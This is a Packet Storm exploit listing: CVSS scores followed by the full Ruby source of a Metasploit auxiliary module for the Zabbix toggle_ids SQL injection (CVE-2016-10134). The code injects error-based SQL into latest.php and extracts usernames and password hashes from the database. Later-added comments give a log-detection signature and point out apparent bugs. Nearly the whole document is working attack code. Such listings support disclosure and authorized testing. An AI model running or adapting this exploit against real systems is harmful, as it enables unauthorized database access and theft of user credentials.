packetstorm — Bperry, 1n3[at]hushmail.com, metasploit.com — PACKETSTORM:180650
History: Aug 31, 2024 - 12:00 a.m.

Zabbix toggle_ids SQL Injection

2024-08-31 00:00:00
bperry, 1n3[at]hushmail.com, metasploit.com
packetstormsecurity.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7

Confidence

Low

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary
# Auxiliary module for CVE-2016-10134: error-based SQL injection through the
# 'toggle_ids[]' POST parameter of Zabbix's latest.php (see #make_injected_request).
# Flow: optionally sign in (#authenticate), enumerate schema names, then read the
# 'alias' and 'passwd' columns of each schema's 'users' table and store them as
# JSON loot. The Description names Zabbix 3.0.3 "and likely prior" as affected.
#
# Detection notes, based only on what this module sends: every injected request
# is a POST to latest.php?output=ajax with favobj=toggle and a toggle_ids[] value
# of the form "348 AND (SELECT ... INFORMATION_SCHEMA ...)". A toggle_ids[] value
# containing SQL keywords is the observable signature in web-server logs.
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient

# Module metadata and datastore options.
#
# REQUIREAUTH       - when true, #authenticate logs in with USERNAME/PASSWORD first.
# USERNAME/PASSWORD - credentials; only used when REQUIREAUTH is set.
# TARGETURI         - base path of the Zabbix web front-end.
def initialize(info = {})
super(update_info(info,
'Name' => 'Zabbix toggle_ids SQL Injection',
'Description' => %q{
This module will exploit a SQL injection in Zabbix 3.0.3 and
likely prior in order to save the current usernames and
password hashes from the database to a JSON file.
},
'References' =>
[
['CVE', '2016-10134'],
['URL', 'https://seclists.org/fulldisclosure/2016/Aug/60']
],
'Author' =>
[
# NOTE(review): this address looks mangled by page extraction; the page header
# credits 1n3[at]hushmail.com. Runtime string left untouched here.
'[email protected]', # discovery
'bperry' # module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2016-08-11'
))

register_options(
[
OptBool.new('REQUIREAUTH', [true, 'Enforce authentication', false]),
OptString.new('USERNAME', [false, 'The username to authenticate with', 'Admin']),
OptString.new('PASSWORD', [false, 'The password to authenticate with', 'zabbix']),
OptString.new('TARGETURI', [true, 'The relative URI for Zabbix', '/zabbix'])
])
end

# Confirms the injection by asking the database to echo a random five-letter
# flag wrapped between two random markers.
#
# Returns CheckCode::Vulnerable when the flag comes back between the markers,
# CheckCode::Safe when the server sends no body or the echoed value differs.
# NOTE(review): fail_with below raises instead of returning CheckCode::Unknown,
# so a body without the markers aborts the check rather than reporting it.
def check

sid, cookies = authenticate

# Random markers keep the extraction regex from matching unrelated page text.
# Each value is hex-encoded (unpack("H*")) so it can be embedded as a 0x.. literal.
left_marker = Rex::Text.rand_text_alpha(5)
right_marker = Rex::Text.rand_text_alpha(5)
flag = Rex::Text.rand_text_alpha(5)

# Error-based extraction: CONCAT(left_marker, flag, right_marker) is expected to
# surface in the response body, where the regex below reads it back
# (presumably through a MySQL grouping error on the RAND(0) key — not verified here).
query = "AND (SELECT 1256 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
query << ",(SELECT MID((IFNULL(CAST(0x#{flag.unpack("H*")[0]} AS CHAR),0x20)),1,54)"
query << " FROM dual LIMIT 0,1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"
query << ' INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'

res = make_injected_request(query, sid, cookies)

unless res and res.body
return Msf::Exploit::CheckCode::Safe
end

match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

# Only an exact echo of the random flag counts as confirmation.
if match[1] == flag
return Msf::Exploit::CheckCode::Vulnerable
end

Msf::Exploit::CheckCode::Safe
end

# Extracts usernames and password hashes, one value per injected request:
#   1. count the rows of INFORMATION_SCHEMA.SCHEMATA,
#   2. read each schema_name with LIMIT cur,1,
#   3. drop the mysql / performance_schema / information_schema entries,
#   4. for every remaining schema: count <db>.users, then read 'alias' and
#      'passwd' for each row ORDER BY alias.
# Every value is read through MID(..., 1, 54), so it is truncated to 54 chars.
# Results are written with store_loot as JSON. Any missing or unmatched
# response calls fail_with, which aborts the run.
def run
sid, cookies = authenticate

left_marker = Rex::Text.rand_text_alpha(5)
right_marker = Rex::Text.rand_text_alpha(5)

# Step 1: number of schemas.
query = " AND (SELECT 5361 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
query << ",(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM"
query << " INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x"
query << " FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

res = make_injected_request(query, sid, cookies)

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

# to_i yields 0 for a non-numeric echo, which simply skips the loop below.
count = match[1].to_i

# Step 2: one request per schema name.
dbs = []
0.upto(count-1) do |cur|

get_dbs = " AND (SELECT 5184 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
get_dbs << ",(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54)"
get_dbs << " FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{cur},1),0x#{right_marker.unpack("H*")[0]},"
get_dbs << "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

res = make_injected_request(get_dbs, sid, cookies)

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

dbs << match[1]
end

# Step 3: ignore MySQL's own schemas; whatever remains is assumed to hold a users table.
dbs.delete("mysql")
dbs.delete("performance_schema")
dbs.delete("information_schema")

# Step 4: per schema, count users then read the two columns per row.
users = []
dbs.each do |db|
cols = ["alias", "passwd"]

# The schema name echoed back by the server is interpolated into the next query as-is.
user_count = " AND (SELECT 6262 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
user_count << ",(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM"
user_count << " #{db}.users),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"
user_count << " INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

res = make_injected_request(user_count, sid, cookies)

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

count = match[1].to_i

0.upto(count-1) do |cur|
user = {}
cols.each do |col|
# ORDER BY alias keeps row 'cur' stable across the two per-row requests.
get_col = " AND (SELECT 6334 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"
get_col << ",(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),1,54)"
get_col << " FROM #{db}.users ORDER BY alias LIMIT #{cur},1),0x#{right_marker.unpack("H*")[0]}"
get_col << ',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'

res = make_injected_request(get_col, sid, cookies)

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

match = /#{left_marker}(.*)#{right_marker}/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

user[col] = match[1]
end
users << user
end
end

# NOTE(review): the content type is 'text/plain' although the data is JSON; cosmetic.
loot = store_loot("zabbixusers.json","text/plain", rhost, users.to_json)

print_good('Users and password hashes stored at ' + loot)

end

# Fetches index.php to obtain the 'sid' hidden input (presumably Zabbix's
# per-session token; it is sent back as both a GET and POST parameter) and the
# initial cookies. With REQUIREAUTH set it POSTs the login form and, on a 302,
# reloads latest.php to pick up the post-login sid and cookies.
#
# Returns [sid, cookies]. Calls fail_with on any unexpected response.
def authenticate
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php')
})

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

cookies = res.get_cookies

match = /name="sid" value="(.*?)">/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

sid = match[1]

if datastore['REQUIREAUTH']

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_post' => {
'sid' => sid,
'form_refresh' => 1,
'name' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'autologin' => 1,
'enter' => 'Sign in'
},
'cookie' => cookies
})

unless res
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

# A redirect is taken as a successful login.
if res.code == 302
cookies = res.get_cookies

# NOTE(review): the key is 'cookies' here but 'cookie' in every other
# send_request_cgi call in this file; looks like a typo that would drop the
# session cookie from this request — verify.
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'latest.php'),
'vars_get' => {
'ddreset' => '1'
},
'cookies' => cookies
})

unless res and res.body
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

cookies = res.get_cookies
match = /name="sid" value="(.*?)">/.match(res.body)

unless match
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

sid = match[1]
# NOTE(review): 'elsif' carries no condition, so the fail_with on the next line
# is parsed as its condition (and raises). This reads as an intended 'else'.
elsif
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end
end

return sid, cookies
end

# Sends one injected request and returns the raw response (callers treat nil
# or a missing body as failure).
#
# sql     - SQL fragment appended after the fixed id "348 "; the fragments built
#           in this file start with " AND".
# sid     - token taken from the sid hidden input (passed as a GET parameter).
# cookies - cookie string reused across requests.
#
# The request is POST latest.php?output=ajax&sid=<sid> with favobj=toggle,
# toggle_ids[]="348 <sql>" and toggle_open_state=0.
def make_injected_request(sql, sid, cookies)
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'latest.php'),
'method' => 'POST',
'vars_get' => {
'output' => 'ajax',
'sid' => sid
},
'vars_post' => {
'favobj' => 'toggle',
'toggle_ids[]' => '348 ' + sql,
'toggle_open_state' => 0
},
'cookie' => cookies
})
end
end
`
